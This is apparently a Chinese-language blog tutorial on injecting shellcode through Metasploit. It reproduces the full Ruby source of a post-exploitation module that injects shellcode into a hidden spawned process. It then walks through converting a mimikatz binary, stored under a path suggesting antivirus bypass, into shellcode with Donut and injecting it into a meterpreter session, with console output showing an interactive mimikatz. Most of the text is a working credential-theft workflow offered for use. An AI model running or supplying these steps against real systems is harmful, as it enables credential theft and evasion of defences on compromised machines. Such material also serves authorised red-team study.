如题所示,今天给大家带来的是msf下交互式执行程序。所有工具下载地址在文末。
首先我们先来介绍下今天的工具Dount,官方的介绍是这样的:
代码语言:javascript复制Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files.
This shellcode can be injected into an arbitrary Windows process for in-memory execution. Given a supported
file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent
shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless
by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit
randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased
from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for
running Assemblies in disposable AppDomains.
It can be used in several ways.大体意思就是它可以执行各种各样的shellcode什么乱七八糟的。
然后下面是我们的一个msf下用于shellcode注入的模块:
代码语言:javascript复制##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/common'
require 'msf/core/post/windows/reflective_dll_injection'
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Memory Shellcode Injection Module',
'Description' => %q{
This module will inject into the memory of a process a specified shellcode.
},
'License' => MSF_LICENSE,
'Author' => [ 'phra <https://iwantmore.pizza>' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
OptInt.new('PID', [false, 'Process Identifier to inject of process to inject the shellcode. (0 = new process)', 0]),
OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
])
end
# Run Method for when run command is issued
def run
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Set variables
shellcode = IO.read(datastore['SHELLCODE'])
pid = datastore['PID']
bits = datastore['BITS']
p = nil
if bits == '64'
bits = ARCH_X64
else
bits = ARCH_X86
end
if pid == 0 or not has_pid?(pid)
p = create_temp_proc(bits)
print_status("Spawned process #{p.pid}")
else
print_status("Opening process #{p.pid}")
p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
end
if bits == ARCH_X64 and client.arch == ARCH_X86
print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
print_error("Migrate to an x64 process and try again.")
return false
elsif arch_check(bits, p.pid)
inject(shellcode, p)
end
end
# Checks the Architeture of a Payload and PID are compatible
# Returns true if they are false if they are not
def arch_check(bits, pid)
# get the pid arch
client.sys.process.processes.each do |p|
# Check Payload Arch
if pid == p["pid"]
print_status("Process found checking Architecture")
if bits == p['arch']
print_good("Process is the same architecture as the payload")
return true
else
print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
return false
end
end
end
end
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc(bits)
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if bits == ARCH_X86 and client.arch == ARCH_X86
cmd = "#{windir}\System32\notepad.exe"
elsif bits == ARCH_X64 and client.arch == ARCH_X64
cmd = "#{windir}\System32\notepad.exe"
elsif bits == ARCH_X64 and client.arch == ARCH_X86
cmd = "#{windir}\Sysnative\notepad.exe"
elsif bits == ARCH_X86 and client.arch == ARCH_X64
cmd = "#{windir}\SysWOW64\notepad.exe"
end
proc = client.sys.process.execute(cmd, nil, {
'Hidden' => datastore['HIDDEN'],
'Channelized' => datastore['CHANNELIZED'],
'Interactive' => datastore['INTERACTIVE']
})
return proc
end
def inject(shellcode, p)
print_status("Injecting shellcode into process ID #{p.pid}")
begin
print_status("Allocating memory in process #{p.pid}")
mem = inject_into_process(p, shellcode)
print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
p.thread.create(mem, 0)
print_good("Successfully injected payload into process: #{p.pid}")
if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
print_status("Interacting")
client.console.interact_with_channel(p.channel)
elsif datastore['CHANNELIZED']
print_status("Retrieving output")
data = p.channel.read
print_line(data) if data
end
rescue ::Exception => e
print_error("Failed to inject Payload to #{p.pid}!")
print_error(e.to_s)
end
end
end我们来看下具体操作:
代码语言:javascript复制 ./donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -o /tmp/payload.bin
- -a:是指定位数,2位64位
- -o:是指定输出
假设已经获取了一个meterpreter:
执行我们刚才的模块即可
代码语言:javascript复制msf5 exploit(multi/handler) > use post/windows/manage/shellcode_inject
msf5 post(windows/manage/shellcode_inject) > set shellcode /tmp/payloads.bin
shellcode => /tmp/payloads.bin
msf5 post(windows/manage/shellcode_inject) > set session 5
session => 5
msf5 post(windows/manage/shellcode_inject) > exploit
[*] Running module against DESKTOP-QQF0MLN
[*] Spawned process 1020
[-] You are trying to inject to a x64 process from a x86 version of Meterpreter.
[-] Migrate to an x64 process and try again.
[*] Post module execution completed
出错了,因为我们是x86的系统,需要指定位数
代码语言:javascript复制msf5 post(windows/manage/shellcode_inject) > show options
Module options (post/windows/manage/shellcode_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
BITS 64 yes Set architecture bits (Accepted: 32, 64)
CHANNELIZED true yes Retrieve output of the process
HIDDEN true yes Spawn an hidden process
INTERACTIVE true yes Interact with the process
PID 0 no Process Identifier to inject of process to inject the shellcode. (0 = new process)
SESSION 5 yes The session to run this module on.
SHELLCODE /tmp/payloads.bin yes Path to the shellcode to execute
msf5 post(windows/manage/shellcode_inject) > set bits 32
bits => 32
msf5 post(windows/manage/shellcode_inject) > exploit
获得一个交互式的mimikatz:
工具下载地址:
代码语言:javascript复制https://github.com/TheWover/donut原文链接:
代码语言:javascript复制https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html
